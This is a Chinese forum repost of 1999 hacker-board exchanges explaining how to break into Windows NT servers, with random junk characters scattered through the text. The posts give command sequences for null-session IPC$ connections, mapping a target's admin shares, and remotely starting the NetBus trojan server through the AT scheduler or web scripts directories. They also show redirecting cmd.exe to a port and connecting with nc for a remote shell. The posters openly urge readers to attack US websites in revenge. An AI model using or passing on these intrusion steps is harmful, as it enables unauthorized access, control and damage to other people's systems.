找回密码
 注册

QQ登录

只需一步,快速开始

关于“怎样进入NT主机”的几点补充

[复制链接]
发表于 2011-1-13 17:03:28 | 显示全部楼层 |阅读模式
《版主页黑客工具和文章的几个问题》中提到:* B6 g0 Q. X! u" }* ~6 Q6 z
请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。
1 R, Y% ?! D% S! T- R  N> 我的机子MMX166,WIN98,2。5G,32M内存。4 Q8 H" `$ J% Y$ T: D' [( N

4 l6 l4 i% ]7 A  `3 |, D黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。
# U: V) B7 e& S8 q9 t你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。+ e- z, _) d1 k7 @* {7 S% h
其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:
  F. U0 n" y% t" G! ]. x: v* snet use \\111.111.111.111\ipc$ "" /user:""; }6 A0 q4 g# D0 }: A
net.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:  g$ g# a+ r5 ]9 m7 l) t; M6 ^) C; s
net view \\111.111.111.111
' g) K# Q/ T1 B' z当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:
& D' [3 l# ^( _9 E  U4 n: o: `net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"4 A$ S) q) b2 F3 D6 _2 L
命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:
! Q0 q6 P# Z, `" W% O- H6 @5 `$ [( ]1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:
5 W* [" Z& f0 w7 u. |net use x: \\111.111.111.111\c$  o8 q; `( {& I8 ]# r. d. y6 ?
net use y: \\111.111.111.111\d$6 p9 Y5 a5 ?1 U8 m7 O% }
这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...
. f% Z4 ?" l0 o2、管理目标NT的用户:4 ^& J! G; a, O5 S7 R( b
从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”) G) e5 J- B. h0 h- K# B' H0 R9 h
键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样& h+ u* w2 g. M
3、管理目标NT的服务& p+ V# N; f. b- v" E% m
选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”4 V: f' D4 r# W
这样你可以管理目标NT上的服务,共享目录
+ o  d4 O0 a9 F4、IIS管理( I* J; l% l1 c/ ^# H" N6 N  Y
选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
" Y0 S7 X5 J' X" L! Z目标NT的FTP、WWW服务你就可以重新配置5 [) h5 ^' R4 V. G; ?, S
5、事件管理6 b6 ^+ c/ R, ~5 D7 l1 Q
“事件查看器”->连接到服务器->111.111.111.111
2 i$ Q5 h3 U7 ]+ v' R6 V3 u8 S6 {2 o* g3 y
还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。
/ B+ k' U- S% J3 c6 P6 K. X6 d# i5 f% ?
当然,98,95也能做一些事情,但很麻烦,比如:7 r3 j- [* d4 b' s- b) `
net use \\111.111.111.111\ipc$
4 P0 L  Q5 ~+ l& s' Cnet use z: \\111.111.111.111\d$6 m; B& a: y. D! T  [! A/ I, t
但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
' |) n' G5 ^, A7 }5 S5 G
- T0 k& W" p( v' {6 J, `我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!  W% @& `- D) W" x
这样,你还可以了解目标机器上能有什么东东供你去用!* r$ J( m) E$ V  ?& R/ [
) l5 G  U# R  ?! E( b

- ]1 C$ g0 [2 T. G* [; [( ?--------------------------------------------------------------------------------
) u' e" t- s2 h' ?- [4 [/ c
4 y! o3 |# [! G. J  O1 k( k>quack于1999-06-12,23:37:445 I& X9 k% P9 N' _1 u6 U
在大作《几个有关黑的问题》中提到:; {3 I; A3 A0 T- V" I( m
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。
( W; y0 N4 q9 o( N
; }( n  @/ _4 ~1 ]$ w$ T; Vkillusa于1999-06-13,03:25:158 l- ^7 ?* j4 P9 }! f! P  C
在大作《Re: 几个有关黑的问题》中提到:5 }0 S# d& D) O* P7 V% D$ e, o

$ H4 |" u+ H' N6 f$ u) @+ Sletmein.exe 暂时没有mypwd参数,十分抱歉& A2 o" e, Y9 Q" C
pinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。' |3 z+ h( w1 |' A; n$ m( G
/ v5 p: K) p! K9 ^( V: L3 a% w
Netbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的7 g1 t& v& i3 H. z9 Y& ~% I% h
服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:
( _6 D) w% s% L- I5 [1 d) n
9 V0 |3 q) Y' {: \0 P1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:: a' s3 l; I7 z5 P
2 P; d/ H8 Z" e3 q: [8 A6 D
C:\>net start schedule5 D0 p9 z( n1 {$ M, v# @
Schedule 正在启动服务.....+ M* B5 i7 l, [
Schedulw 服务启动成功。
: S* O+ H, Q& B& O" EC:\>at /?' N) E" P' X( J" A4 j& E' d* r, J
AT 命令排定在特定的日期和时间运行某些命令和程序。2 [9 N# e$ @. k# R3 f# U6 z
运行 AT 命令之前必须先启动 Schedule 服务。+ d) p9 i3 D# o3 D9 V& @

5 g; N3 W6 O& g& n# l' g% jAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]: S$ T, k: R# h4 y
AT [\\computername] time [/INTERACTIVE]4 a1 n! b8 [) L
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"2 M5 s6 j: R2 H* C# |1 o

' [" y6 O4 l. p0 J3 p& ~\\computername 指定远程计算机。 如果省略这个参数% Y# C2 ^5 x  b7 b$ C+ u7 i
命令会被排定在本机上运行。
' V8 t1 H& @* F+ i) Rid 指定给排定进度命令的识别号。
3 a7 o& G) @0 Y1 Y" }- g: D: w% k
/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。
# V3 A- d0 Y5 s/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。2 ]& i3 N; j6 n* A) b8 \; V
time 指定命令运行的时间。
- L5 Q# o/ k" b" a4 c8 b/interactive 允许作业在运行时,与用户通过桌面交互。
* @& a, p: d0 Z$ x8 T
3 H- n5 K& H( z8 D! [3 A/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。
0 j1 I1 z( p3 J如果省略日期,则默认为在每月的本日运行。
7 S; L% ]3 V1 [9 L* m% }, }: a& F2 B$ v5 d, X
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。
1 _6 t- g: x8 y1 [) j/ r/ [
( g# V8 P% p  m"command" 准备运行的 Windows NT 命令或批处理文件。3 G1 T/ c  {) x6 U6 f$ _

5 J( ?7 v& h7 o2 dC:\>
5 g" [& `$ n- U: X: ]
1 q; |1 B4 {/ J4 |& j$ W, o知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:
9 L. V0 [, o3 o! Y/ O' b4 X1 _1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
% ^' c" H5 `7 T! K# ~: f* w2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start' s: f1 \5 [; s3 c- J" h9 I& f
3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:* B% g; X' W3 I
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
' E" o( d; S1 r' i( ?; }: S9 `其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:
- _4 e7 U- G0 M8 R8 qMicrosoft(R) Windows NT(TM)
$ c7 ?' d3 d0 P. ~3 ~2 {(C) Copyright 1985-1996 Microsoft Corp.. j& L3 R, k4 [" a4 G: e
C:\>
1 B* p% R$ e% m% ?& }
9 d  O$ X" I8 v5 ?' D! E2、利用web启动ntsrv.exe或其他程序在目的服务器
+ Q! \1 u: d/ B+ @8 b
$ ], ]; J$ d  ^$ ?# \; H; M: n$ Z将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:
: N8 P0 T& s3 v' Q3 ~4 n0 i' {- ahttp://x.x.x.x/scripts/ntsrv.exe /port:64321
' I* q% [, }0 s3 O) B: Dhttp://x.x.x.x/cgi-gin/ntsrv.exe /port:64321' J' f) P3 _& `. V/ u3 q
该程序就启动了) H) Z+ R9 E7 C- \0 b3 c
# J) ^6 O9 F" ?, r, W4 O" j0 _
我只提这几中方法!
) ~2 U1 H3 J. I& K要成功,必须打好基础工,对操作系统充分了解!
, d6 W5 }6 y, ~6 G0 D( _# x- Y* P- ]6 c! p/ l2 f" r1 Q
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2025-6-15 13:23

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表